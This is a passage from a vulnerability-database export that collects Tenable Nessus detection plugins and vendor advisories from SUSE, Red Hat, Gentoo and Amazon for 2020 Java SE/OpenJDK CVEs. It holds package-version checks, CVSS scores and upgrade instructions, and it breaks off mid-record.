value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\npkgs = [\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.amzn2.0.1', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-javadoc-debug-1.8.0.272.b10-1.amzn2.0.1', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.amzn2.0.1', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-javadoc-zip-debug-1.8.0.272.b10-1.amzn2.0.1', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk / java-1.8.0-openjdk-accessibility / java-1.8.0-openjdk-accessibility-debug / etc\");\n}", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-14T06:30:46", "description": "This update for java-1_8_0-ibm fixes the following issues :\n\nUpdate to Java 8.0 Service Refresh 6 Fix Pack 20\n[bsc#1180063,bsc#1177943] CVE-2020-14792 CVE-2020-14797 CVE-2020-14781\nCVE-2020-14779 CVE-2020-14798 CVE-2020-14796 CVE-2020-14803\n\n - Class libraries :\n\n - SOCKETADAPTOR$SOCKETINPUTSTREAM.READ is blocking for\n more time that the set timeout\n\n - Z/OS specific C function send_file is changing the file\n pointer position\n\n - Java Virtual Machine :\n\n - Crash on iterate java stack\n\n - Java process hang on SIGTERM\n\n - JIT Compiler :\n\n - JMS performance regression from JDK8 SR5 FP40 TO FP41\n\n - Class Libraries :\n\n - z15 high utilization following Z/VM and Linux migration\n from z14 To z15\n\n - Java Virtual Machine :\n\n - Assertion failed when trying to write a class file\n\n - Assertion failure at modronapi.cpp\n\n - Improve the performance of defining and finding classes\n\n - JIT Compiler :\n\n - An assert in ppcbinaryencoding.cpp may trigger when\n running with traps disabled on power\n\n - AOT field offset off by n bytes\n\n - Segmentation fault in jit module on ibm z platform\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 3, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-01-06T00:00:00", "title": "SUSE SLES12 Security Update : java-1_8_0-ibm (SUSE-SU-2021:0032-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14798", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-devel", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:java-1_8_0-ibm", "p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-plugin", "p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-alsa"], "id": "SUSE_SU-2021-0032-1.NASL", "href": "https://www.tenable.com/plugins/nessus/144761", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:0032-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144761);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2020-14779\", \"CVE-2020-14781\", \"CVE-2020-14792\", \"CVE-2020-14796\", \"CVE-2020-14797\", \"CVE-2020-14798\", \"CVE-2020-14803\");\n\n script_name(english:\"SUSE SLES12 Security Update : java-1_8_0-ibm (SUSE-SU-2021:0032-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for java-1_8_0-ibm fixes the following issues :\n\nUpdate to Java 8.0 Service Refresh 6 Fix Pack 20\n[bsc#1180063,bsc#1177943] CVE-2020-14792 CVE-2020-14797 CVE-2020-14781\nCVE-2020-14779 CVE-2020-14798 CVE-2020-14796 CVE-2020-14803\n\n - Class libraries :\n\n - SOCKETADAPTOR$SOCKETINPUTSTREAM.READ is blocking for\n more time that the set timeout\n\n - Z/OS specific C function send_file is changing the file\n pointer position\n\n - Java Virtual Machine :\n\n - Crash on iterate java stack\n\n - Java process hang on SIGTERM\n\n - JIT Compiler :\n\n - JMS performance regression from JDK8 SR5 FP40 TO FP41\n\n - Class Libraries :\n\n - z15 high utilization following Z/VM and Linux migration\n from z14 To z15\n\n - Java Virtual Machine :\n\n - Assertion failed when trying to write a class file\n\n - Assertion failure at modronapi.cpp\n\n - Improve the performance of defining and finding classes\n\n - JIT Compiler :\n\n - An assert in ppcbinaryencoding.cpp may trigger when\n running with traps disabled on power\n\n - AOT field offset off by n bytes\n\n - Segmentation fault in jit module on ibm z platform\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1177943\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1180063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14779/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14792/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14796/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14797/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14798/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14803/\"\n );\n # https://www.suse.com/support/update/announcement/2021/suse-su-20210032-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?24a45f64\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2021-32=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2021-32=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2021-32=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2021-32=1\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2021-32=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2021-32=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2021-32=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2021-32=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2021-32=1\n\nSUSE Enterprise Storage 5 :\n\nzypper in -t patch SUSE-Storage-5-2021-32=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2021-32=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14792\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-alsa-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-plugin-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"java-1_8_0-ibm-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"java-1_8_0-ibm-devel-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-alsa-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-plugin-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"java-1_8_0-ibm-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"java-1_8_0-ibm-devel-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-alsa-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-plugin-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"java-1_8_0-ibm-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"java-1_8_0-ibm-devel-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-alsa-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-plugin-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"java-1_8_0-ibm-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"java-1_8_0-ibm-devel-1.8.0_sr6.20-30.78.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_8_0-ibm\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "redhat": [{"lastseen": "2021-02-16T08:31:44", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14779", "CVE-2020-14796", "CVE-2020-14797"], "description": "IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update upgrades IBM Java SE 8 to version 8 SR6-FP20.\n\nSecurity Fix(es):\n\n* OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685) (CVE-2020-14797)\n\n* OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization, 8236862) (CVE-2020-14779)\n\n* OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-02-16T12:33:49", "published": "2021-02-16T12:30:57", "id": "RHSA-2021:0530", "href": "https://access.redhat.com/errata/RHSA-2021:0530", "type": "redhat", "title": "(RHSA-2021:0530) Moderate: java-1.8.0-ibm security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2021-01-25T03:50:36", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-2590", "CVE-2020-14781", "CVE-2020-2604", "CVE-2020-2583", "CVE-2020-14798", "CVE-2020-14779", "CVE-2020-2601", "CVE-2020-14797", "CVE-2020-2659", "CVE-2020-2593", "CVE-2020-14796", "CVE-2020-2654"], "description": "### Background\n\nOpenJDK is a free and open-source implementation of the Java Platform, Standard Edition. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenJDK. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenJDK users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/openjdk-8.272_p10\"\n \n\nAll OpenJDK (binary) users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/openjdk-bin-8.272_p10\"\n \n\nAll OpenJDK JRE (binary) users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/openjdk-jre-bin-8.272_p10\"", "edition": 1, "modified": "2021-01-25T00:00:00", "published": "2021-01-25T00:00:00", "id": "GLSA-202101-19", "href": "https://security.gentoo.org/glsa/202101-19", "title": "OpenJDK: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2021-01-15T01:27:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "description": "**Issue Overview:**\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). ([CVE-2020-14779 __](<https://access.redhat.com/security/cve/CVE-2020-14779>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14781 __](<https://access.redhat.com/security/cve/CVE-2020-14781>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14782 